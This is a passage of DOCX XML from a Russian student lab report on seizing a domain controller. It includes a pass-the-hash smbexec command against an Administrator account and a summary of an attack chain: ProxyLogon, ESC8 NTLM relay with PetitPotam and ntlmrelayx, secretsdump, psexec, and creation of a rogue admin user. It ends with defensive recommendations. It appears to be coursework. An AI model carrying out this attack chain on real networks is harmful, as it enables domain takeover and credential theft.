        <w:t xml:space="preserve">smbexec.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">для получения shell:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">proxychains</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> python3 smbexec.py </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-hashes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">aad3b435b51404eeaad3b435b51404ee:1b21da9cb62cfcaf16c5dd263255bf6f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-no-pass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ampire.corp/Administrator@10.10.10.20</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Результаты (рис. 1):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="5987142"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Итоги" title="" id="40" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="image/0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Итоги</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="42"/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успешно выполнена комплексная атака на инфраструктуру организации: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Начальный доступ</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">получен через уязвимость</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ProxyLogon</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">в Microsoft Exchange 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Внутренняя разведка</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">позволила обнаружить доменную сеть, контроллер домена и центр сертификации.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Обнаружена критическая уязвимость ESC8</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">в Active Directory Certificate Services, позволяющая выполнить NTLM Relay-атаку.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Использована связка утилит</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(PetitPotam + ntlmrelayx + gettgtpkinit + secretsdump) для получения хешей администратора домена.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Захват контроллера домена</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">выполнен через psexec с использованием полученного NTLM-хеша.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Достигнута цель</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: создан пользователь</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">hacker</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, добавлен в группу</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Administrators</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, получен флаг</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">35269</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Работа демонстрирует важность:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Своевременного обновления Exchange Server.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Настройки AD CS с отключением Web Enrollment или установкой Request Disposition в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.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Мониторинга аномальной активности, связанной с принудительной аутентификацией (PetitPotam).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Использования защищённых протоколов аутентификации (Kerberos вместо NTLM).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№5-F. ЗАХВАТ КОНТРОЛЛЕРА ДОМЕНА 2</dc:title>
  <dc:creator>Боровиков Даниил; Хрусталев Влад; Гисматуллин Артём; Чесноков Артёмий; Коннова Татьяна; Нефедова Наталья; Уткина Алина; Бансимба Клодели</dc:creator>
  <dc:language>ru-RU</dc:language>
  <cp:keywords/>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-12-07T21:38:31Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-07T21:38:31Z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Рис.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temTitleDelim">
    <vt:lpwstr>.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Листинг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Листинги</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="49" name="lot">
    <vt:lpwstr>True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Список таблиц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IBM Plex Serif</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="57" name="mainfontoptions">
    <vt:lpwstr>Ligatures=Common,Ligatures=TeX,Scale=0.94</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="58" name="mathfont">
    <vt:lpwstr>STIX Two Math</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="59" name="mathfontoptions">
    <vt:lpwstr/>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="60" name="monofont">
    <vt:lpwstr>IBM Plex Mono</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="61" name="monofontoptions">
    <vt:lpwstr>Scale=MatchLowercase,Scale=0.94,FakeStretch=0.9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IBM Plex Serif</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="72" name="romanfontoptions">
    <vt:lpwstr>Ligatures=Common,Ligatures=TeX,Scale=0.94</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="73" name="sansfont">
    <vt:lpwstr>IBM Plex Sans</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="74" name="sansfontoptions">
    <vt:lpwstr>Ligatures=Common,Ligatures=TeX,Scale=MatchLowercase,Scale=0.94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Кибербезопасность предприятия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